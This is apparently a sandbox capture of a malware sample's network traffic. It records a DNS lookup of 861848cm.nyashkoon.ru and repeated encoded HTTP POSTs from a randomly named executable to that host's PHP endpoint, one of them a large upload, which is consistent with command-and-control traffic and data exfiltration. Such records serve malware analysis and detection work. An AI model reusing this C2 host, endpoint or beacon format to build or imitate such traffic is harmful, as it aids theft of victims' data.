                                                                                            Nov 5, 2024 23:54:36.878017902 CET5014780192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:36.878124952 CET5014780192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:36.883359909 CET805014737.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:36.884299040 CET805014637.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:36.884375095 CET5014680192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:37.020560026 CET5014880192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:37.025474072 CET805014837.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:37.025969028 CET5014880192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:37.026089907 CET5014880192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:37.031263113 CET805014837.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:37.229960918 CET5014780192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:37.234920979 CET805014737.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:37.234966993 CET805014737.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:37.383560896 CET5014880192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:37.388473034 CET805014837.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:37.697130919 CET805014737.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:37.771986961 CET805014737.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:37.772037983 CET5014780192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:37.837976933 CET805014837.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:37.911415100 CET805014837.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:37.911473036 CET5014880192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:38.042496920 CET5014780192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:38.042618990 CET5014880192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:38.043395996 CET5014980192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:38.047818899 CET805014737.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:38.047871113 CET5014780192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:38.048264980 CET805014937.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:38.048322916 CET5014980192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:38.048398018 CET5014980192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:38.048719883 CET805014837.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:38.048763990 CET5014880192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:38.053165913 CET805014937.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:38.399200916 CET5014980192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:38.404059887 CET805014937.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:38.860486984 CET805014937.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:38.936009884 CET805014937.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:38.938033104 CET5014980192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:39.053953886 CET5014980192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:39.054130077 CET5015080192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:54:39.059238911 CET805015037.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:54:39.059375048 CET5015080192.168.2.437.44.238.250
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 5, 2024 23:52:31.364613056 CET | 58864 | 53 | 192.168.2.4 | 1.1.1.1
Nov 5, 2024 23:52:31.496128082 CET | 53 | 58864 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 5, 2024 23:52:31.364613056 CET | 192.168.2.4 | 1.1.1.1 | 0x85c9 | Standard query (0) | 861848cm.nyashkoon.ru | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 5, 2024 23:52:31.496128082 CET | 1.1.1.1 | 192.168.2.4 | 0x85c9 | No error (0) | 861848cm.nyashkoon.ru | | 37.44.238.250 | A (IP address) | IN (0x0001) | false
                                                                                            • 861848cm.nyashkoon.ru
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49736 | 37.44.238.250 | 80 | 2212 | C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 23:52:31.535790920 CET | 332 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 344
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
Nov 5, 2024 23:52:32.337801933 CET | 25 | IN | HTTP/1.1 100 Continue
Nov 5, 2024 23:52:32.430362940 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:52:30 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 1364
                                                                                            Connection: keep-alive
Nov 5, 2024 23:52:32.465353966 CET | 308 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 384
                                                                                            Expect: 100-continue
Nov 5, 2024 23:52:32.696547985 CET | 25 | IN | HTTP/1.1 100 Continue
Nov 5, 2024 23:52:33.009985924 CET | 308 | IN | HTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:52:30 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 152
                                                                                            Connection: keep-alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49737 | 37.44.238.250 | 80 | 2212 | C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 23:52:32.964920044 CET | 309 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
Nov 5, 2024 23:52:33.776776075 CET | 25 | IN | HTTP/1.1 100 Continue
Nov 5, 2024 23:52:33.855174065 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:52:31 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49738 | 37.44.238.250 | 80 | 2212 | C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 23:52:33.151738882 CET | 309 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1284
                                                                                            Expect: 100-continue
Nov 5, 2024 23:52:33.974004984 CET | 25 | IN | HTTP/1.1 100 Continue
Nov 5, 2024 23:52:34.044421911 CET | 308 | IN | HTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:52:31 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 152
                                                                                            Connection: keep-alive
Nov 5, 2024 23:52:34.053056002 CET | 309 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Nov 5, 2024 23:52:34.287420034 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:52:34.287585974 CET1024OUTData Raw: 56 57 5f 5e 53 5c 50 59 5a 5f 52 51 54 58 5b 58 55 5c 59 58 51 55 52 53 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: VW_^S\PYZ_RQTX[XU\YXQURSTRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY%Y//.T<(+<3 Z*:**$(^ <= 9&8X '&2)'X$.Q-.
                                                                                            Nov 5, 2024 23:52:34.958347082 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:52:32 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP
                                                                                            Nov 5, 2024 23:52:34.958661079 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:52:32 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            3 | 192.168.2.4 | 49739 | 37.44.238.250 | 80 | 2212 | C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            Nov 5, 2024 23:52:33.994740009 CET | 311 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 137804
                                                                                            Expect: 100-continue
                                                                                            Nov 5, 2024 23:52:34.958822966 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:52:35.586251020 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:52:33 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            4 | 192.168.2.4 | 49742 | 37.44.238.250 | 80 | 2212 | C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            Nov 5, 2024 23:52:35.186801910 CET | 309 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Nov 5, 2024 23:52:35.540827990 CET1024OUTData Raw: 56 51 5a 54 56 5b 55 58 5a 5f 52 51 54 5c 5b 5a 55 54 59 57 51 57 52 52 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: VQZTV[UXZ_RQT\[ZUTYWQWRRTRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY&,*?(Y<(*5*=*\%+77?%++Y,%_4%9'X$.Q->
                                                                                            Nov 5, 2024 23:52:36.008297920 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:52:36.079199076 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:52:34 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            5 | 192.168.2.4 | 49743 | 37.44.238.250 | 80 | 2212 | C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            Nov 5, 2024 23:52:36.223640919 CET | 309 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Nov 5, 2024 23:52:36.574080944 CET1024OUTData Raw: 56 52 5f 5b 56 58 50 5f 5a 5f 52 51 54 59 5b 5e 55 53 59 57 51 56 52 59 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: VR_[VXP_Z_RQTY[^USYWQVRYTRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY&,%+0Y?3=![)[*3+#,%?4:47&X%)'X$.Q-*
                                                                                            Nov 5, 2024 23:52:37.035279036 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:52:37.105963945 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:52:35 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            6 | 192.168.2.4 | 49745 | 37.44.238.250 | 80 | 2212 | C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            Nov 5, 2024 23:52:37.236274958 CET | 333 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:52:37.586878061 CET1024OUTData Raw: 56 55 5a 55 56 5d 50 53 5a 5f 52 51 54 5e 5b 59 55 56 59 5c 51 54 52 5f 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: VUZUV]PSZ_RQT^[YUVY\QTR_TRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY%,<8>0 [*:&)[!0+?#?*(?.5Y!7&^1'X$.Q-6
                                                                                            Nov 5, 2024 23:52:38.262613058 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:52:38.262666941 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:52:36 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP
                                                                                            Nov 5, 2024 23:52:38.262705088 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:52:36 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            7 | 192.168.2.4 | 49746 | 37.44.238.250 | 80 | 2212 | C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            Nov 5, 2024 23:52:38.431940079 CET | 333 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:52:38.790508032 CET1024OUTData Raw: 56 50 5a 5e 56 5e 50 53 5a 5f 52 51 54 53 5b 5d 55 57 59 5a 51 54 52 5a 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: VPZ^V^PSZ_RQTS[]UWYZQTRZTRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY%,?"W?(<_+#Y=:="';#+',%#'%)'X$.Q-


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            8 | 192.168.2.4 | 49748 | 37.44.238.250 | 80 | 2212 | C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            Nov 5, 2024 23:52:39.062621117 CET | 333 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1284
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:52:39.415720940 CET1284OUTData Raw: 53 54 5f 5f 56 57 50 52 5a 5f 52 51 54 5b 5b 5b 55 52 59 5f 51 56 52 5b 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: ST__VWPRZ_RQT[[[URY_QVR[TRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY%;>+7(\)>?-=%;(X .W<-7[96 #&'X$.Q-"
                                                                                            Nov 5, 2024 23:52:39.864979982 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:52:39.940107107 CET | 308 | IN | HTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:52:37 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 152
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 00 1e 20 14 3c 04 04 13 27 3b 24 53 29 10 3a 07 29 30 33 5f 2f 54 2c 11 3e 0d 01 05 2a 2b 20 50 34 3f 0d 1a 36 31 2a 00 37 0c 2f 5b 29 3b 21 5f 05 1d 39 5b 30 17 2c 51 3e 0c 0b 05 3d 09 28 0a 25 30 37 18 29 05 08 5b 20 04 3e 57 26 58 2d 11 31 0b 28 0c 3f 34 2d 5d 2e 2f 28 0f 25 3a 2a 57 09 16 20 55 24 55 24 01 29 31 24 06 25 2e 35 10 32 39 3f 54 2a 3c 23 12 34 27 36 17 3d 0d 2b 58 23 24 3e 1e 26 2a 3e 40 25 3e 05 51 3f 08 26 55 22 0d 20 54 01 30 5d 4f
                                                                                            Data Ascii: <';$S):)03_/T,>*+ P4?61*7/[);!_9[0,Q>=(%07)[ >W&X-1(?4-]./(%:*W U$U$)1$%.529?T*<#4'6=+X#$>&*>@%>Q?&U" T0]O


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            9 | 192.168.2.4 | 49749 | 37.44.238.250 | 80 | 2212 | C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            Nov 5, 2024 23:52:39.202200890 CET | 333 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:52:39.555944920 CET1024OUTData Raw: 53 55 5a 59 56 5f 55 5e 5a 5f 52 51 54 5f 5b 59 55 57 59 5e 51 56 52 58 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: SUZYV_U^Z_RQT_[YUWY^QVRXTRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY%\8?"U=(#>#8\*?="$8 -)=?- 4')&'X$.Q-2
                                                                                            Nov 5, 2024 23:52:40.024277925 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:52:40.101548910 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:52:38 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            10 | 192.168.2.4 | 49751 | 37.44.238.250 | 80 | 2212 | C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            Nov 5, 2024 23:52:40.238478899 CET | 309 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Nov 5, 2024 23:52:40.590897083 CET | 1024 | OUT | Data Raw: 53 54 5a 5b 53 5c 50 59 5a 5f 52 51 54 5d 5b 5b 55 5c 59 57 51 53 52 5f 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: STZ[S\PYZ_RQT][[U\YWQSR_TRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY&/<><8(> ;>:=>53/#%?>#].C##72X&)'X$.Q-
                                                                                            Nov 5, 2024 23:52:41.049932003 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:52:41.125943899 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:52:39 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            11 | 192.168.2.4 | 49752 | 37.44.238.250 | 80 | 2212 | C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            Nov 5, 2024 23:52:41.383840084 CET | 333 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
